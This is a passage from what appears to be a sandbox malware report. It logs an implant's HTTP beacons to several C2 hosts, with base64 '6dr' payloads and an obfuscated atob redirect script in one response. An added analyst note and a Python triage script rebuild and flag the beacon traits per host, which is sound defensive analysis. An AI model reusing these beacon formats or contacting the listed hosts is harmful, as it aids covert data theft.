                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 35 54 66 56 39 67 71 61 42 6c 6b 4c 36 58 49 41 6b 6e 6a 46 4d 6f 67 33 53 45 55 2f 6b 66 63 51 42 79 35 4b 77 55 78 75 57 6e 53 45 72 55 6d 58 31 54 66 6b 4c 35 76 32 47 67 57 77 68 66 78 74 78 56 61 32 66 71 6e 79 2b 75 55 5a 57 31 38 57 6a 74 54 5a 79 4a 30 33 2b 68 6d 67 54 4e 46 55 58 69 6d 4a 79 31 68 6b 59 46 43 6a 71 46 56 6e 39 59 77 41 79 73 62 62 52 4e 4e 39 6c 6b 49 6f 6d 50 6a 39 49 62 37 32 65 6d 57 72 76 72 70 68 72 4b 53 31 4d 45 4a 51 4c 2f 6c 64 57 7a 76 77 4d 58 2f 6c 33 44 46 4e 66 7a 43 48 76 6a 56 70 2f 73 53 7a 4b 78 6e 2b 32 69 36 43 35 48 41 38 59 32 33 37 39 79 57 56 62 48 76 5a 5a 77 64 4f 65 74 49 6c 47 44 65 34 32 53 58 6e 49 57 59 6b 4b 77 3d 3d
                                                                Data Ascii: 6dr=5TfV9gqaBlkL6XIAknjFMog3SEU/kfcQBy5KwUxuWnSErUmX1TfkL5v2GgWwhfxtxVa2fqny+uUZW18WjtTZyJ03+hmgTNFUXimJy1hkYFCjqFVn9YwAysbbRNN9lkIomPj9Ib72emWrvrphrKS1MEJQL/ldWzvwMX/l3DFNfzCHvjVp/sSzKxn+2i6C5HA8Y2379yWVbHvZZwdOetIlGDe42SXnIWYkKw==
                                                                Nov 27, 2024 08:55:58.505959034 CET | 364 | IN | HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 27 Nov 2024 07:55:58 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                Strict-Transport-Security: max-age=31536000
                                                                Content-Encoding: gzip
                                                                Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 16 55 be ee 81 15 3e 79 81 a6 be 21 6e 65 51 ce a6 e5 c9 b9 16 66 fe 2e d9 15 be 81 b6 b6 ea 9a 36 fa 50 13 01 ca 47 04 94 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: (gzip-compressed body in a single 0x67-byte chunk; not printable as text, see Data Raw)
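Sessions 20 to 27 show one implant (PID 4872) sending the same request shape to three different hosts: a short alphanumeric directory as the path, a single form field named 6dr whose value is raw base64 (unencoded '+', '/' and trailing '=' in an application/x-www-form-urlencoded body, which a browser would percent-encode), Origin and Referer pointing at the request's own host and path, Connection: close, and a mobile UCBrowser User-Agent from a Windows x86 process. Only www.t91rl7.pro answered 200; www.vayui.top and www.rgenerousrs.store returned 404. The Python below is an added example, not Joe Sandbox code: it parses raw HTTP requests rebuilt from these captures (at most one GET and one POST per host, 6dr values copied from the report, status codes as shown above), extracts those traits, groups them per host, and reports which host answered. The trait thresholds (3 to 5 character directory, 16 or more base64 characters) are my heuristics, not a published FormBook signature.

```python
"""Per-host triage of the beacon shape captured in sessions 20 to 27.
Added example, not Joe Sandbox code. Requests are rebuilt from the report;
the trait thresholds are heuristics chosen for this capture."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

UA = ("UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 "
      "UCBrowser/9.9.0.543 U2/1.0.0 Mobile")
# Raw base64 alphabet: a browser form post would percent-encode '+', '/' and '='.
RAW_B64 = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")
SHORT_DIR = re.compile(r"/[a-z0-9]{3,5}/")


def get_req(host, path, query):
    return (f"GET {path}?{query} HTTP/1.1\r\nAccept-Language: en-US\r\nHost: {host}\r\n"
            f"Connection: close\r\nUser-Agent: {UA}\r\n\r\n")


def post_req(host, path, body):
    return (f"POST {path} HTTP/1.1\r\nHost: {host}\r\nOrigin: http://{host}\r\n"
            f"Referer: http://{host}{path}\r\nCache-Control: no-cache\r\n"
            f"Content-Length: {len(body)}\r\nConnection: close\r\n"
            f"Content-Type: application/x-www-form-urlencoded\r\n"
            f"User-Agent: {UA}\r\n\r\n{body}")


def parse_request(raw):
    """Split an HTTP/1.1 request into (method, target, header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def form_params(query):
    """Split k=v&k=v without decoding, so raw '+' and '/' survive for inspection."""
    return [tuple(p.partition("=")[::2]) for p in query.split("&") if p]


def indicators(raw):
    """Return (host, parameter names, traits) for one request."""
    method, target, h, body = parse_request(raw)
    host = h.get("host", "")
    url = urlsplit(target)
    params = form_params(body if method == "POST" else url.query)
    traits = set()
    if SHORT_DIR.fullmatch(url.path):
        traits.add("short_dir_path")
    if h.get("connection", "").lower() == "close":
        traits.add("connection_close")
    if "Mobile" in h.get("user-agent", ""):
        traits.add("mobile_ua")  # the sender here is a Windows x86 process
    if method == "POST":
        if (h.get("origin") == f"http://{host}"
                and h.get("referer") == f"http://{host}{url.path}"):
            traits.add("self_origin_and_referer")
        if len(params) == 1 and RAW_B64.match(params[0][1]):
            traits.add("single_raw_b64_param")
    return host, [k for k, _ in params], traits


def triage(captures):
    """captures: iterable of (raw_request, status_code); returns a per-host summary."""
    per_host = defaultdict(lambda: {"params": set(), "traits": set(), "status": set()})
    for raw, status in captures:
        host, names, traits = indicators(raw)
        per_host[host]["params"].update(names)
        per_host[host]["traits"].update(traits)
        per_host[host]["status"].add(status)
    return dict(per_host)


def live_hosts(summary):
    """Hosts that answered 2xx; in this capture every other host returned 404."""
    return sorted(h for h, r in summary.items()
                  if any(200 <= s < 300 for s in r["status"]))


# Constructed from sessions 20, 21, 24 and 25 of the report.
CAPTURES = [
    (get_req("www.vayui.top", "/vg0z/",
             "6dr=75uk3ictCfC5d95jc9ErhxuZnXjbt/7lQbKW3bXizAnaAV7ibEnK2RjZpZGGD2cxunkBvA8A"
             "/q4ys0sLjHkTFrWSncccbEBJ6T2ZUmHvVL3BVpynffLQ4AgBix/2srBcYLhAIes=&Kp=6N8LUn6pGPW"), 404),
    (post_req("www.rgenerousrs.store", "/o362/",
              "6dr=IYlouYrI0yQl1UhjbhrWg9A4XW4aDAbXtcqQZ2cDb3pAvvZh2/rT9+WaSXJu8H08nFh0ZCzh2MZq44g+sMHvA3m37j"
              "+OAwRiGhkY3OrFfzUmrUKfalDc6DOlVUeg9cFBlOkX4fw2xo6AVCaNZRoCMCZ5aJXqmgHNmqtUbjjl0RzTxe42+PZlk43VL3DIaFEs/cv1lW59Re6B"), 404),
    (get_req("www.rgenerousrs.store", "/o362/",
             "Kp=6N8LUn6pGPW&6dr=FaNItuPk5TcZ9HdRFxGis99OVV5mBzvNwqypTl8+VCtQ49ZNgIXGwO2PY0xc/TpBxHoMd3n"
             "/rLst/5dAk+rqA0qO3SSFE3YHITh7+9T1aVwk8yasaXm8yz75cRrj4u8mi8kZiIg="), 404),
    (post_req("www.t91rl7.pro", "/jhb8/",
              "6dr=5TfV9gqaBlkLoGYAnELFEog0dkU/v/cUBy9KwWd+W02Ey1WX0SfkHZv2OAW1u/xQxVW+fvfy+uAZW3kWjerY0J0i1"
              "BmictFUXimJy11eYFKjqxRn95wPtcbYZtN9hkIsmPiuIY/cejarvuVhl7S2FEJSP/lMTQC/TnD91yl3BCaiqVIzjfSQYhH82giw5nAWa2P7vlayUzK6"), 200),
]

if __name__ == "__main__":
    summary = triage(CAPTURES)
    for host, rec in summary.items():
        print(host, sorted(rec["status"]), sorted(rec["params"]), sorted(rec["traits"]))
    print("answered:", live_hosts(summary))
```

Grouping per host rather than per request is what makes the rotation visible: the parameter name 6dr and the full trait set recur on every host, so the hosts are candidates for one implant's C2 list, and the status codes separate the host that answered from the ones that did not.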


                                                                Session ID: 27 | Source IP: 192.168.2.6 | Source Port: 50016 | Destination IP: 154.88.22.101 | Destination Port: 80 | PID: 4872 | Process: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 27, 2024 08:55:59.627667904 CET | 1786 | OUT | POST /jhb8/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.t91rl7.pro
                                                                Origin: http://www.t91rl7.pro
                                                                Referer: http://www.t91rl7.pro/jhb8/
                                                                Cache-Control: no-cache
                                                                Content-Length: 1244
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 35 54 66 56 39 67 71 61 42 6c 6b 4c 36 58 49 41 6b 6e 6a 46 4d 6f 67 33 53 45 55 2f 6b 66 63 51 42 79 35 4b 77 55 78 75 57 6e 61 45 33 79 36 58 7a 77 33 6b 46 5a 76 32 49 41 57 78 68 66 78 4b 78 56 43 79 66 71 37 49 2b 74 73 5a 58 51 67 57 6c 63 54 5a 68 70 30 33 78 42 6d 6c 63 74 45 4d 58 6a 4c 43 79 31 78 6b 59 46 43 6a 71 45 6c 6e 74 5a 77 41 70 73 62 59 5a 74 4d 79 68 6b 49 55 6d 50 36 49 49 61 50 4d 43 43 71 72 76 50 31 68 70 34 71 31 44 45 4a 57 4f 2f 6b 41 57 7a 69 77 4d 55 61 4c 33 44 78 72 66 78 65 48 75 33 38 65 37 65 69 6e 49 41 7a 6c 77 67 32 55 67 42 55 4b 41 55 6e 56 32 77 69 30 46 6d 66 6d 41 46 45 58 65 76 52 67 45 53 4b 6d 38 56 75 48 45 45 4e 65 66 50 33 2b 4f 6f 73 6d 50 55 57 35 50 67 4c 41 48 5a 65 6c 74 2f 33 71 6a 59 73 34 34 36 57 6d 2f 54 6a 78 7a 70 79 4f 72 4e 53 44 73 56 57 4c 59 48 6d 6d 7a 43 56 68 71 39 56 43 74 70 68 36 72 2f 66 61 57 52 4a 76 53 39 6e 61 62 6b 75 36 56 69 32 68 66 30 50 4b 54 56 35 4f 37 7a 73 6d 56 51 50 58 31 6b 34 70 55 50 69 4e 5a 33 [TRUNCATED]
                                                                Data Ascii: 6dr=5TfV9gqaBlkL6XIAknjFMog3SEU/kfcQBy5KwUxuWnaE3y6Xzw3kFZv2IAWxhfxKxVCyfq7I+tsZXQgWlcTZhp03xBmlctEMXjLCy1xkYFCjqElntZwApsbYZtMyhkIUmP6IIaPMCCqrvP1hp4q1DEJWO/kAWziwMUaL3DxrfxeHu38e7einIAzlwg2UgBUKAUnV2wi0FmfmAFEXevRgESKm8VuHEENefP3+OosmPUW5PgLAHZelt/3qjYs446Wm/TjxzpyOrNSDsVWLYHmmzCVhq9VCtph6r/faWRJvS9nabku6Vi2hf0PKTV5O7zsmVQPX1k4pUPiNZ3HB7CoYF+WApD+8lmP8P/BUvg8ovoVLGrRpH1p0/wtEjpiYaiRRE5bn1tcCxb04MD9Dy2z2qJKhb6oMWSzw4JYPdkX6PH9FoqyF73RumXBi3pY7W/ytFNuctjb7Mo5ZjHN1a9gdk2OUh2o2KLowWnCzKm5HqwUqwxk92rXPCmxhlGHxzlb1xWVH1IMF0cA1b1W1msXkQmcIFP/eVFGW9yT5buqoSDvnUouWmDy54bENm7qd6vsCyRB3OSoNR55DWi7zytw2Xns2Yy9PwtQDBhvno4cQKpaVtNqYonzjJu1xvhPLVfurtG+RbNviPV1j2Jj7biI+MzayZhw9fYcrpFIRGGhtalS/yOlsdfYcWJgnWVC1q8k90xsslUISCR+fqd29JwO03Rt0AwhUdK7y3MsYQU5wcJaF4Qd142bl/LO7WcBKGeEwbaXVql+EfX0//P7hss1pjMtw4BH+UV0aBQOTFB/TCOeQLPRMxPGnTPPvqmu+lWug/N7/IJk3U7OvCSDOq6jVrUXlZ013YrbkHj8hpyZd4d8/pp68N8DdfcxoX19zaN2gCtgCZLf7EjM8Yk0Lwkj4E7uWEV0P4awNfZMY59pwUMBNXaMpteKQK9XSDSOQhhRAelCbD0W0unASZAQ1OyPsdzQKhmjt2nv+PRSmK6TPn0ed3ASp [TRUNCATED]
                                                                Timestamp: Nov 27, 2024 08:56:01.189699888 CET | Bytes transferred: 364 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 27 Nov 2024 07:56:00 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                Strict-Transport-Security: max-age=31536000
                                                                Content-Encoding: gzip
                                                                Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 16 55 be ee 81 15 3e 79 81 a6 be 21 6e 65 51 ce a6 e5 c9 b9 16 66 fe 2e d9 15 be 81 b6 b6 ea 9a 36 fa 50 13 01 ca 47 04 94 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 67)N.,(ON,VPV/Ji%IAf>U>y!neQf.6PGZ0


                                                                Session ID: 28 | Source IP: 192.168.2.6 | Source Port: 50017 | Destination IP: 154.88.22.101 | Destination Port: 80 | PID: 4872 | Process: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                Timestamp: Nov 27, 2024 08:56:02.297992945 CET | Bytes transferred: 496 | Direction: OUT | Data: GET /jhb8/?6dr=0R31+Vq/Nm8msngZkniPPNslS216pvARFjw5y1poIV3xx1K38BT3Oq7zCSGYp4hHlG+YTfvzleF+eXVetOmv3IFg7wS9Zfpqa2312nFAQ2OMwXhW64NslbGydbZxuWxpmOq3INM=&Kp=6N8LUn6pGPW HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-US
                                                                Host: www.t91rl7.pro
                                                                Connection: close
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Timestamp: Nov 27, 2024 08:56:03.874685049 CET | Bytes transferred: 332 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 27 Nov 2024 07:56:03 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                Strict-Transport-Security: max-age=31536000
                                                                Data Raw: 35 35 0d 0a 3c 73 63 72 69 70 74 3e 6c 6f 63 61 74 69 6f 6e 5b 27 68 27 2b 27 72 65 27 2b 27 66 27 5d 20 3d 20 61 74 6f 62 28 27 61 48 52 30 63 48 4d 36 4c 79 38 7a 4d 47 51 78 4c 6e 51 35 4d 54 46 76 5a 43 35 77 63 6d 38 36 4f 44 6b 78 4d 51 3d 3d 27 29 3c 2f 73 63 0d 0a 35 0d 0a 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 55<script>location['h'+'re'+'f'] = atob('aHR0cHM6Ly8zMGQxLnQ5MTFvZC5wcm86ODkxMQ==')</sc5ript>0


                                                                Session ID: 29 | Source IP: 192.168.2.6 | Source Port: 50019 | Destination IP: 209.74.77.107 | Destination Port: 80 | PID: 4872 | Process: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                Timestamp: Nov 27, 2024 08:56:09.463917971 CET | Bytes transferred: 767 | Direction: OUT | Data: POST /alu5/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.learnwithus.site
                                                                Origin: http://www.learnwithus.site
                                                                Referer: http://www.learnwithus.site/alu5/
                                                                Cache-Control: no-cache
                                                                Content-Length: 208
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 72 2b 66 4f 51 58 4c 6f 49 55 4d 6c 58 4e 6c 6f 47 32 4a 41 4d 4f 41 62 66 2b 45 70 6a 44 62 49 4a 74 6c 70 79 4a 63 56 30 4f 46 46 64 34 45 4c 31 52 36 41 6e 4a 75 61 71 79 78 76 54 30 76 6e 37 50 78 42 4d 37 36 52 30 63 74 71 2b 52 63 39 38 58 56 77 72 47 4c 58 36 6e 72 6e 35 46 48 76 32 66 43 49 4d 4b 72 79 76 49 4a 57 39 4b 4f 59 79 43 6c 34 4a 2f 42 61 67 66 7a 34 45 53 78 6c 79 6a 44 59 45 44 36 77 6e 66 45 56 52 6a 56 42 59 61 6f 50 79 33 35 55 6b 32 4e 66 41 5a 70 42 33 53 4c 45 31 54 56 70 79 65 43 2b 35 53 2f 79 69 67 5a 6b 6b 74 71 74 39 78 78 69 56 48 6d 61 59 32 66 70 51 68 76 47 46 63 56 35
                                                                Data Ascii: 6dr=r+fOQXLoIUMlXNloG2JAMOAbf+EpjDbIJtlpyJcV0OFFd4EL1R6AnJuaqyxvT0vn7PxBM76R0ctq+Rc98XVwrGLX6nrn5FHv2fCIMKryvIJW9KOYyCl4J/Bagfz4ESxlyjDYED6wnfEVRjVBYaoPy35Uk2NfAZpB3SLE1TVpyeC+5S/yigZkktqt9xxiVHmaY2fpQhvGFcV5
                                                                Timestamp: Nov 27, 2024 08:56:10.717557907 CET | Bytes transferred: 533 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                Date: Wed, 27 Nov 2024 07:56:10 GMT
                                                                Server: Apache
                                                                Content-Length: 389
                                                                Connection: close
                                                                Content-Type: text/html
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                Session ID: 30 | Source IP: 192.168.2.6 | Source Port: 50020 | Destination IP: 209.74.77.107 | Destination Port: 80 | PID: 4872 | Process: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                Timestamp: Nov 27, 2024 08:56:12.127145052 CET | Bytes transferred: 791 | Direction: OUT | Data: POST /alu5/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.learnwithus.site
                                                                Origin: http://www.learnwithus.site
                                                                Referer: http://www.learnwithus.site/alu5/
                                                                Cache-Control: no-cache
                                                                Content-Length: 232
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 72 2b 66 4f 51 58 4c 6f 49 55 4d 6c 57 73 56 6f 45 56 78 41 4f 75 41 63 56 65 45 70 70 6a 62 45 4a 74 70 70 79 49 49 46 30 34 39 46 64 64 67 4c 30 51 36 41 6b 4a 75 61 68 53 77 45 4e 45 76 53 37 50 74 2f 4d 2b 61 52 30 63 35 71 2b 56 51 39 38 41 42 7a 6f 32 4c 56 32 48 72 70 6d 31 48 76 32 66 43 49 4d 4b 58 4d 76 4d 64 57 39 61 2b 59 79 6a 6c 37 41 66 42 5a 71 2f 7a 34 41 53 77 73 79 6a 43 50 45 42 43 4b 6e 63 73 56 52 6d 35 42 59 49 4d 4d 6f 6e 35 6f 67 32 4e 4a 4d 38 55 59 37 42 47 30 72 52 35 32 6d 73 43 49 31 45 69 6f 2b 54 5a 48 32 39 4b 76 39 7a 70 51 56 6e 6d 77 61 32 6e 70 43 32 6a 68 4b 6f 77 61 72 66 6b 37 57 58 57 4c 56 75 32 2b 69 46 64 77 70 37 6b 4d 42 77 3d 3d
                                                                Data Ascii: 6dr=r+fOQXLoIUMlWsVoEVxAOuAcVeEppjbEJtppyIIF049FddgL0Q6AkJuahSwENEvS7Pt/M+aR0c5q+VQ98ABzo2LV2Hrpm1Hv2fCIMKXMvMdW9a+Yyjl7AfBZq/z4ASwsyjCPEBCKncsVRm5BYIMMon5og2NJM8UY7BG0rR52msCI1Eio+TZH29Kv9zpQVnmwa2npC2jhKowarfk7WXWLVu2+iFdwp7kMBw==
                                                                Timestamp: Nov 27, 2024 08:56:13.425523043 CET | Bytes transferred: 533 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                Date: Wed, 27 Nov 2024 07:56:13 GMT
                                                                Server: Apache
                                                                Content-Length: 389
                                                                Connection: close
                                                                Content-Type: text/html
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                Session ID: 31 | Source IP: 192.168.2.6 | Source Port: 50021 | Destination IP: 209.74.77.107 | Destination Port: 80 | PID: 4872 | Process: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                Timestamp: Nov 27, 2024 08:56:14.802114964 CET | Bytes transferred: 1804 | Direction: OUT | Data: POST /alu5/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.learnwithus.site
                                                                Origin: http://www.learnwithus.site
                                                                Referer: http://www.learnwithus.site/alu5/
                                                                Cache-Control: no-cache
                                                                Content-Length: 1244
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 72 2b 66 4f 51 58 4c 6f 49 55 4d 6c 57 73 56 6f 45 56 78 41 4f 75 41 63 56 65 45 70 70 6a 62 45 4a 74 70 70 79 49 49 46 30 34 31 46 65 75 59 4c 31 79 53 41 6c 4a 75 61 69 53 77 48 4e 45 76 31 37 50 31 6a 4d 2b 57 72 30 66 42 71 78 57 59 39 6f 6c 39 7a 2f 47 4c 56 73 6e 72 6f 35 46 47 33 32 66 53 4d 4d 4b 6e 4d 76 4d 64 57 39 59 6d 59 77 79 6c 37 47 66 42 61 67 66 79 73 45 53 78 4a 79 6a 72 36 45 42 47 67 6b 74 4d 56 52 47 70 42 65 37 6f 4d 6a 6e 35 51 73 57 4d 4b 4d 38 51 39 37 42 62 46 72 55 74 4d 6d 73 47 49 33 31 4c 67 74 58 4a 4d 72 64 62 4c 68 6b 52 63 54 33 32 33 65 6d 76 6d 44 48 66 51 48 35 4a 74 6b 4a 30 74 43 46 6a 4b 64 4e 4f 72 75 56 49 2b 71 36 35 75 55 43 76 52 56 76 7a 55 77 43 2f 75 7a 67 61 6e 67 45 32 6e 76 7a 51 78 37 79 55 7a 75 6b 41 2f 2f 72 6a 58 73 37 4d 51 31 56 6a 70 67 2b 36 62 51 48 43 41 2f 4f 78 69 58 4a 36 67 72 35 5a 54 54 56 4a 55 49 70 67 70 7a 52 76 31 45 54 30 44 71 67 76 67 52 75 67 6b 78 75 68 47 53 2f 74 56 75 61 6b 65 50 53 6f 31 4f 66 45 33 4f 6b [TRUNCATED]
                                                                Data Ascii: 6dr=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 [TRUNCATED]
                                                                Timestamp: Nov 27, 2024 08:56:16.166023970 CET | Bytes transferred: 533 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                Date: Wed, 27 Nov 2024 07:56:15 GMT
                                                                Server: Apache
                                                                Content-Length: 389
                                                                Connection: close
                                                                Content-Type: text/html
